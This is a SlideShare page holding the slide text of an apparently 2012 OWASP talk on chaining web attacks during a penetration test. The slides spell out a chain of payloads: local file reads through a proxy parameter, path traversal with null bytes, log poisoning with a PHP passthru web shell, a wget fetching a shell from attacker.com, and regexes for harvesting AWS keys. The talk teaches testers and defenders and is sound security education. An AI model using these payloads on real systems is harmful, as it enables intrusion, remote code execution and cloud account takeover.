Security Tips to run Docker in ProductionSecurity Tips to run Docker in Production
Security Tips to run Docker in ProductionGianluca Arbezzano
 

Similar to Attack Chaining: Advanced Maneuvers for Hack Fu (20)

OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ Infosectrain
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya Morimoto
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon prague
 
Watch How The Giants Fall: Learning from Bug Bounty Results
Watch How The Giants Fall: Learning from Bug Bounty ResultsWatch How The Giants Fall: Learning from Bug Bounty Results
Watch How The Giants Fall: Learning from Bug Bounty Results
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application Hacking
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of them
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web Application
 
Reversing & Malware Analysis Training Part 9 - Advanced Malware Analysis
Reversing & Malware Analysis Training Part 9 - Advanced Malware AnalysisReversing & Malware Analysis Training Part 9 - Advanced Malware Analysis
Reversing & Malware Analysis Training Part 9 - Advanced Malware Analysis
 
Threats, Threat Modeling and Analysis
Threats, Threat Modeling and AnalysisThreats, Threat Modeling and Analysis
Threats, Threat Modeling and Analysis
 
Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3
 
Deep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 ArsenalDeep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 Arsenal
 
Docker Security workshop slides
Docker Security workshop slidesDocker Security workshop slides
Docker Security workshop slides
 
Breaking the cyber kill chain!
Breaking the cyber kill chain!Breaking the cyber kill chain!
Breaking the cyber kill chain!
 
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiGrâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
 
Mitigating Exploits Using Apple's Endpoint Security
Mitigating Exploits Using Apple's Endpoint SecurityMitigating Exploits Using Apple's Endpoint Security
Mitigating Exploits Using Apple's Endpoint Security
 
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawTakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
 
Jump into Squeak - Integrate Squeak projects with Docker & Github
Jump into Squeak - Integrate Squeak projects with Docker & GithubJump into Squeak - Integrate Squeak projects with Docker & Github
Jump into Squeak - Integrate Squeak projects with Docker & Github
 
Sql Injections With Real Life Scenarious
Sql Injections With Real Life ScenariousSql Injections With Real Life Scenarious
Sql Injections With Real Life Scenarious
 
Your WordPress Website Is/Not Hacked
Your WordPress Website Is/Not HackedYour WordPress Website Is/Not Hacked
Your WordPress Website Is/Not Hacked
 
Security Tips to run Docker in Production
Security Tips to run Docker in ProductionSecurity Tips to run Docker in Production
Security Tips to run Docker in Production
 

Recently uploaded

Generative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxGenerative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxfnnc6jmgwh
 
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security ObservabilityGlenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security Observabilityitnewsafrica
 
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...itnewsafrica
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentPim van der Noll
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesKari Kakkonen
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityIES VE
 
Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024TopCSSGallery
 
A Glance At The Java Performance Toolbox
A Glance At The Java Performance ToolboxA Glance At The Java Performance Toolbox
A Glance At The Java Performance ToolboxAna-Maria Mihalceanu
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Mark Goldstein
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI AgeCprime
 
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...itnewsafrica
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsRavi Sanghani
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesThousandEyes
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
QCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesQCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesBernd Ruecker
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...Wes McKinney
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integrationmarketing932765
 

Recently uploaded (20)

Generative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxGenerative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
 
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security ObservabilityGlenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
 
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examples
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a reality
 
Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024
 
A Glance At The Java Performance Toolbox
A Glance At The Java Performance ToolboxA Glance At The Java Performance Toolbox
A Glance At The Java Performance Toolbox
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI Age
 
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and Insights
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
QCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesQCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architectures
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
 

Attack Chaining: Advanced Maneuvers for Hack Fu

  • 1. Attack Chaining Advanced Maneuvers for Hack Fu OWASP ATL 31 May 2012
  • 2. About Us WHO ARE THES DUDES? •  Rob •  Oscar Sr. Security Associate Security Associate @ Stach & Liu @ Stach & Liu 2  
  • 3. Penetration Test vs. Vulnerability Assessment 3  
  • 4. vs. 4  
  • 5. Simulate a real world attack against a target network or application. - EVERYBODY 5  
  • 6. It answers the question, “could someone break in?” 6  
  • 7. Penetration Testing Exploit & Penetrate Information Gathering 2 3 Escalate Privileges 1 Maintain 4a 4b Access Deny Access
  • 8. Pen Testing Scenario •  Web application penetration test •  Cloud-based infrastructure hosts multiple sites •  Out-sourced PHP development to many contractors •  Determine attackers ability to compromise PII or infrastructure 8  
  • 9. Step 1 – Explore 9  
  • 10. Step 2 – Read Code http://vuln.com/dir/share.js ... AJAX.Call({ method:’POST’, url:’include/s_proxy.php’ ... 10  
  • 11. Step 3 – Proxy? http://vuln.com/dir/include/s_proxy.php? redirect_url=http://www.google.com 11  
  • 12. Step 4 – Read Local Files! http://vuln.com/dir/include/s_proxy.php? redirect_url=file:///etc/passwd 12  
  • 13. Attack Chaining – Maneuver 1 13  
  • 14. Attack Chaining – Maneuver 1 14  
  • 15. Step 5 – Gather More Info http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/httpd.conf 15  
  • 16. Step 6 – Keep Going… http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf 16  
  • 17. Step 6 – Keep Going… http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf VirtualHost * ServerName vuln.com  DocumentRoot /var/www/sites/vuln.com/docroot ErrorLog logs/vuln.com_error_log /VirtualHost 17  
  • 18. Step 7 – Back to DirBuster 18  
  • 19. Step 8 – Review Code http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///var/www/sites/vuln.com/ docroot/dir/include/controller.php 19  
  • 20. Step 8 – Review Code http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///var/www/sites/vuln.com/ docroot/dir/include/controller.php ?php require_once('includes/config.php'); $module = !empty($_REQUEST['module']) ? $_REQUEST['module'] : $config['module']; $action = !empty($_REQUEST['action']) ? $_REQUEST['action'] : $config['action']; $currentModuleFile = 'modules/'.$module.'/'.$action.'.php'; include($currentModuleFile) exit; ? 20  
  • 21. Attack Chaining – Maneuver 2 21  
  • 22. Attack Chaining – Maneuver 2 22  
  • 23. Step 9 – Null Byte Injection http://vuln.com/dir/include/controller.php ?module=../../../../../../etc/passwd%00 23  
  • 24. Step 8 – Review Code http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///var/www/sites/vuln.com/ docroot/dir/include/controller.php ?php require_once('includes/config.php'); $module = !empty($_REQUEST['module']) ? $_REQUEST['module'] : $config['module']; $action = !empty($_REQUEST['action']) ? $_REQUEST['action'] : $config['action']; $currentModuleFile = 'modules/'.$module.'/'.$action.'.php'; include($currentModuleFile) exit; ? 24  
  • 25. Step 10 – Review Gathered Info http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf 25  
  • 26. Step 10 – Back to Virtual Conf http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf VirtualHost * ServerName vuln.com DocumentRoot /var/www/sites/vuln.com/docroot ErrorLog logs/vuln.com_error_log /VirtualHost 26  
  • 27. Step 11 – Where To Stick It? http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat.jpg, referer: http://www.vuln.com/ 27  
  • 28. Step 12 – Poison Logs 28  
  • 29. Step 12 – Poison Logs 29  
  • 30. Step 12 – Poison Logs ? echo 'pre'; passthru($_GET['cmd']); echo '/pre'; ? 30  
  • 31. Step 13 – PHP in the Log http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat.jpg, referer: http://www.vuln.com/ 31  
  • 32. Step 13 – PHP in the Log http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat.jpg, referer: http://www.vuln.com/ [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat-attack.jpg, referer: ? echo 'pre';passthru( $_GET['cmd']);echo 'pre'; ? 32  
  • 33. Step 14 – Execute Code http://vuln.com/dir/include/controller.php ?module=/../../../../../../../../etc/httpd/ logs/vuln.com_error_log%00cmd=ls; /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat-attack.jpg, referer: controller.php example.php includes modules phpinfo.php … 33  
  • 34. Step 14 – Execute Code ? echo 'pre'; passthru('ls'); echo '/pre'; ? /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat-attack.jpg, referer: controller.php example.php includes modules phpinfo.php … 34  
  • 35. Attack Chaining – Maneuver 3 35  
  • 36. Attack Chaining – Maneuver 3 36  
  • 37. Step 15 – Upload Shell http://vuln.com/dir/include/controller.php ?module=/../../../../../../../../etc/httpd/ logs/vuln.com_error_log%00cmd=wget%20http:// attacker.com/gny.php;   37  
  • 38. Step 16 – Enjoy! 38  
  • 39. Step 17 – I  want  more! ec2[^d]['][A-Z0-9]{20}['] ec2.*['][A-Z0-9]{20}['] ['][A-Za-z0-9+/]{40}['] ec2.*['][A-Z0-9]{20}['] ec2(D)*['][A-Z0-9]{20}['] amazon.*['][A-Z0-9]{20}['] (amazon|ec2).*['][A-Z0-9]{20}['] amazon(D)*['][A-Z0-9]{20}['] access secret ['][A-Z0-9]{20}['] [A-Za-z0-9+/]{40} amazon.*['][A-Z0-9]{20}['].*['][A-Za-z0-9+/]{40}['] aws.*['][A-Z0-9]{20}['] ['][A-Za-z0-9+/]{40}['] amazon.*['][A-Z0-9]{20}['] ['][A-Za-z0-9+/]{40}['] secret.*['][A-Za-z0-9+/]{40}['] ['][A-Za-z0-9+/]{40}['].*amazon 39  
  • 40. Step 18 – Amazon  AWS  Regex $this-­‐amazonService  =  new  Zend_Service_Amazon('DB3BAD768F2F11C7628',     $aws_key  =  '8AFB5AF55D1E6620EE1';     define('AMAZON_KEY',  '372B8E408D1484C538F');     if  (!defined('awsAccessKey'))  define('awsAccessKey',  '9F6EB7471C926194884');     //if  (!defined('awsAccessKey'))  define('awsAccessKey',  '4CAD89B86344CD8C26C');     define('AMAZON_AES_ACCESS_KEY_ID',  '95C95B8DC84AA24C0EC');   40  
  • 41. Step 19 – AWS  Takeover 41  
  • 42. Step 20 – Make  It  Your  Own 42  
  • 43. Cost of Amazon Cloud Compromise CRI TICAL EXPOSURE 1.  Found 8 Amazon Secret Keys to access Amazon S3 2.  Found that 2 of the 8 have administrator access to Amazon EC2 3.  Attacker launches 100 Extra Large Clusters $1,049,000 43  
  • 44. Take Them Off The Web CRI TICAL EXPOSURE 1.  Found 8 Amazon Secret Keys to access Amazon S3 2.  Found that 2 of the 8 have administrator access to Amazon EC2 3.  Attacker shuts down and deletes all servers and backups permanently PRICELESS 44  
  • 45. Attack Chaining – Hack Fu 45  
  • 46. Attack Chaining – Hack Fu 46  
  • 47. Why Is This Happening? 1.  Local File Include 4.  Insecure Credential •  File Read Only Storage •  Code Execution 5.  Overly Permissive 2.  Null Byte Injection Amazon AWS Keys 3.  Log Poisoning 6.  Sensitive Information Disclosure 47  
  • 48. Web à Mass Malware Deployment 48  
  • 49. Web à Data Center Compromise 49  
  • 50. Web à Internal Network Compromise 50  
  • 51. Internal Assessmentà SSN Bank #’s 51  
  • 53. Step 1 – Target Wireless 53  
  • 54. Step 1 – Target Wireless 54  
  • 55. Step 2 – Port Scan 55  
  • 56. Step 3 – Test Default Creds 56  
  • 58. Step 4 – Control AP 58  
  • 59. Step 5 – Read All E-mail 59  
  • 60. Step 6 – Listen To VOIP 60  
  • 61. Step 7 – Open All Doors 61  
  • 62. Step 7 – Open All Doors 62  
  • 63. 63  
  • 64. Step 7 – Server Room Door 64  
  • 65. Is This Real Life? 1.  Insecure Wireless 4.  Weak Passwords Encryption 5.  Sensitive Information 2.  Improper Network Disclosure Segmentation 3.  Insecure Default Configuration 65  
  • 66. Protection – How? 1.  People 2.  Policy 3.  Processes 4.  Strategic / Tactical Security 5.  Defense In-Depth 66  
  • 67. Defense In-Depth I S P R O T E C T I O N A G A I N S T. . . 67  
  • 68. How Do You Get Better? 68  
  • 69. Synthesis and Patterns CAN BE BOTH GOOD AND BAD 69  
  • 70. Attack Visualization LIKE BOBBY FISCHER 70  
  • 71.
  • 72. Thank You 72